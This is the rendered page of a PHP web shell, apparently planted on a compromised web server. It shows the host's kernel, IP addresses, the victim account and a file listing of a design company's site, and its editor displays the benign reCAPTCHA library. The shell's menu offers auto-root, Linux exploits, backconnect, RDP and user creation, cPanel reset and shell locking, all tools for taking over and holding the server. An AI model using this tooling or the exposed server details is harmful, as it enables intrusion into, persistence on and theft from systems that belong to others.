Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.222.161.57
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
designprovider /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
DP-Backup-21stNov2022
[ DIR ]
drwx------
__MACOSX
[ DIR ]
drwxr-xr-x
banner
[ DIR ]
drwxr-xr-x
clients
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
design_admin
[ DIR ]
drwxr-xr-x
font-awesome
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
image1
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
img1
[ DIR ]
drwxr-xr-x
includes
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
poster
[ DIR ]
drwxr-xr-x
search
[ DIR ]
drwxr-xr-x
th
[ DIR ]
drwxr-xr-x
uk
[ DIR ]
drwxr-xr-x
us
[ DIR ]
drwxr-x---
video
[ DIR ]
drwxr-xr-x
.htaccess
1.4
KB
-rw-r--r--
DP-Backup-21stNov2022.zip
305.87
MB
-rw-r--r--
EULA.txt
33.32
KB
-rw-r--r--
README.txt
2.98
KB
-rw-r--r--
about.php
9.58
KB
-rw-r--r--
app.php
16.47
KB
-rw-r--r--
blog-details.php
13.33
KB
-rw-r--r--
blog.php
13.72
KB
-rw-r--r--
captcha_code_file.php
2.85
KB
-rw-r--r--
contact.php
22.22
KB
-rw-r--r--
domain.php
677
B
-rw-r--r--
dp-review.php
14.92
KB
-rw-r--r--
ecommerce.php
5.22
KB
-rw-r--r--
error_log
1.08
MB
-rw-r--r--
final-process.php
18.7
KB
-rw-r--r--
googleads.php
18.51
KB
-rw-r--r--
graphic-artwork.php
40.73
KB
-rw-r--r--
index.php
5.58
KB
-rw-r--r--
info.php
20
B
-rw-r--r--
itailor-rebranding.php
1.11
KB
-rw-r--r--
our-clients.php
9.84
KB
-rw-r--r--
our-project.php
6.95
KB
-rw-r--r--
privacy-policy.php
1.65
KB
-rw-r--r--
pro-cms.php
7.21
KB
-rw-r--r--
recaptchalib.php
4.46
KB
-rw-r--r--
register.php
8.45
KB
-rw-r--r--
robots.txt
375
B
-rw-r--r--
search-engine-optimization.php
27.24
KB
-rw-r--r--
sem.php
13.62
KB
-rw-r--r--
sendmail.php
6.42
KB
-rw-r--r--
sitemap.xml
1.53
KB
-rw-r--r--
smm.php
11.88
KB
-rw-r--r--
standard-cms.php
7.51
KB
-rw-r--r--
terms.php
1.66
KB
-rw-r--r--
thankyou.php
11.97
KB
-rw-r--r--
thankyou01.php
6.83
KB
-rw-r--r--
thankyoukeyword.php
14.25
KB
-rw-r--r--
web-design-old.php
18.61
KB
-rw-r--r--
web-design.php
40.13
KB
-rw-r--r--
youtube.php
8.66
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : recaptchalib.php
<?php /** * This is a PHP library that handles calling reCAPTCHA. * - Documentation and latest version * https://developers.google.com/recaptcha/docs/php * - Get a reCAPTCHA API Key * https://www.google.com/recaptcha/admin/create * - Discussion group * http://groups.google.com/group/recaptcha * * @copyright Copyright (c) 2014, Google Inc. * @link http://www.google.com/recaptcha * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ /** * A ReCaptchaResponse is returned from checkAnswer(). */ class ReCaptchaResponse { public $success; public $errorCodes; } class ReCaptcha { private static $_signupUrl = "https://www.google.com/recaptcha/admin"; private static $_siteVerifyUrl = "https://www.google.com/recaptcha/api/siteverify?"; private $_secret; private static $_version = "php_1.0"; /** * Constructor. * * @param string $secret shared secret between site and ReCAPTCHA server. */ function ReCaptcha($secret) { if ($secret == null || $secret == "") { die("To use reCAPTCHA you must get an API key from <a href='" . self::$_signupUrl . "'>" . self::$_signupUrl . "</a>"); } $this->_secret=$secret; } /** * Encodes the given data into a query string format. * * @param array $data array of string elements to be encoded. * * @return string - encoded request. */ private function _encodeQS($data) { $req = ""; foreach ($data as $key => $value) { $req .= $key . '=' . urlencode(stripslashes($value)) . '&'; } // Cut the last '&' $req=substr($req, 0, strlen($req)-1); return $req; } /** * Submits an HTTP GET to a reCAPTCHA server. * * @param string $path url path to recaptcha server. * @param array $data array of parameters to be sent. * * @return array response */ private function _submitHTTPGet($path, $data) { $req = $this->_encodeQS($data); $response = file_get_contents($path . $req); return $response; } /** * Calls the reCAPTCHA siteverify API to verify whether the user passes * CAPTCHA test. * * @param string $remoteIp IP address of end user. * @param string $response response string from recaptcha verification. * * @return ReCaptchaResponse */ public function verifyResponse($remoteIp, $response) { // Discard empty solution submissions if ($response == null || strlen($response) == 0) { $recaptchaResponse = new ReCaptchaResponse(); $recaptchaResponse->success = false; $recaptchaResponse->errorCodes = 'missing-input'; return $recaptchaResponse; } $getResponse = $this->_submitHttpGet( self::$_siteVerifyUrl, array ( 'secret' => $this->_secret, 'remoteip' => $remoteIp, 'v' => self::$_version, 'response' => $response ) ); $answers = json_decode($getResponse, true); $recaptchaResponse = new ReCaptchaResponse(); if (trim($answers ['success']) == true) { $recaptchaResponse->success = true; } else { $recaptchaResponse->success = false; $recaptchaResponse->errorCodes = $answers [error-codes]; } return $recaptchaResponse; } } ?>
Close